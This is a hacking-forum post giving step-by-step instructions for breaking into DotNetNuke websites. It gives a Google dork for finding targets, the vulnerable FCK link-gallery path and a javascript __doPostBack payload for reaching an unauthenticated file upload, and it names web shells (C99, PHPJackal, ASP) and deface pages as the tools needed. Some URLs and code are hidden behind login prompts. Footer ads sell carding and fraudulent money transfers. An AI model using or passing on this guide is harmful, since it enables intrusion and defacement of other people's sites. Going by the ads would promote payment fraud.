DotNetNuke Hacking (DNN)

c0rrupter

V.I.P
V.I.P
Joined
11 yrs. 6 mth. 30 days
Messages
1,914
Reaction score
3,194
Age
31
Wallet
0$
Yo, gangsters. I'm new here. I figured I should post alittle something to help out. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting.

DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal website.

Below are the easy steps to implement the attack:

• First use a google dork to find the appropriate target.

inurl:”/portals/0? site:.com


• You can change com to your desired domain name like bd ph ae
• Now search your website on the google after searching you will get many websites choose any one of it.
• Its time to check the required vulnerability on the website just place this code after the web address.

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

• For example if you got
Please, Log in or Register to view URLs content!

• Replace it
Please, Log in or Register to view URLs content!

• If you will get this screen means this web is going to hack.
dnn1-300x279.jpg

• Now choose the third option “A File On Your Site” And than paste this java code on your address bar.

javascript:__doPostBack(‘ctlURL$cmdUpload’,”)

• It will allow you to upload a files on this website you can upload text ~ swf ~ jpg ~ gif ~ pdf ~ Files.

• After uploading files you can find your file on this address
Please, Log in or Register to view URLs content!


here extension is txt jpg swf etc.

• In our case

Please, Log in or Register to view URLs content!



The command is
Code:
Please, Log in or Register to view codes content!


Also a better Google Dork would follow.
Code:
Please, Log in or Register to view codes content!


Also I forgot to include,
Things you will need:

An ASP Shell
PHPJackal OR C99 Shell
Some nice Deface pages.
 
Paid adv. expire in 2 months
CLICK to buy Advertisement !
westernunion carding Verified & Trusted WesternUnion | MoneyGram | Bank - Transferring [299$ BTC for 2000$ WU]
electronics carding Verified & Trusted Electronics Carding, Carding iPhone, Samsung Carding, MacBook Carding, Laptops Carding
Top Bottom